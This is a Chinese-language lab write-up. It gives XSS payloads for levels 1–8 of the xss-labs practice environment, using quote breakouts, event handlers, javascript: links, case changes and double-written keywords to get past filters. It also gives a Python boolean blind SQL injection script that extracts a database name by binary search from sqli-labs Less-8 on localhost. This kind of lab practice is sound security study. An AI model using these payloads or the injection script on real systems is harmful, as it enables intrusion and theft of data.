xss-labs 1到8关
第一关
直接插入
http://127.0.0.1/xss-labs/level1.php?name=url?name=<script>alert()</script>
第二关
用">闭合后插入
"><script>alert(123)</script>
第三关
用 ’ 闭合后插入
' onfocus='javascript:alert(123)'
第四关
用"闭合后插入
" onfocus="javascript:alert(123)"
第五关
这一关on___被检测,使用a标签插入
"><a href=javascript:alert(123)>aaa</a>
第六关
使用大写HREF绕过
"><a HREF=javascript:alert(123)>aaa</a>
第七关
使用双写href和script绕过
"><a hrhrefef=javascripscriptt:alert(123)>aaa</a>
第八关
把JavaScript编码后绕过
javascript:alert(123)
python实现自动化布尔自注的代码进行优化(二分查找)
import requests
url = "http://127.0.0.1/sqli/Less-8/index.php"
# 可打印 ASCII 范围(0x20–0x7E)
MIN_CHAR = 32 # ' '
MAX_CHAR = 126 # '~'
def get_database_length() -> int:
"""二分法推断数据库名长度"""
low, high = 1, 50
while low <= high:
mid = (low + high) // 2
payload = f"1' AND (SELECT LENGTH(DATABASE()) > {mid}) -- "
if "You are in" in requests.get(url, params={"id": payload}).text:
low = mid + 1
else:
high = mid - 1
return low # 最终 low 即为长度
def get_database_name(length: int) -> str:
"""二分法逐字符推断数据库名"""
name = ""
for pos in range(1, length + 1):
low, high = MIN_CHAR, MAX_CHAR
while low <= high:
mid = (low + high) // 2
# 使用 ORD + SUBSTRING 比较 ASCII 码
payload = (
f"1' AND (ORD(SUBSTRING(DATABASE(), {pos}, 1)) > {mid}) -- "
)
if "You are in" in requests.get(url, params={"id": payload}).text:
low = mid + 1
else:
high = mid - 1
name += chr(low) # low 就是当前字符的 ASCII
return name
if __name__ == "__main__":
length = get_database_length()
if length:
print("Database length:", length)
db_name = get_database_name(length)
print("Database name:", db_name)
else:
print("Failed to determine database length.")
结果
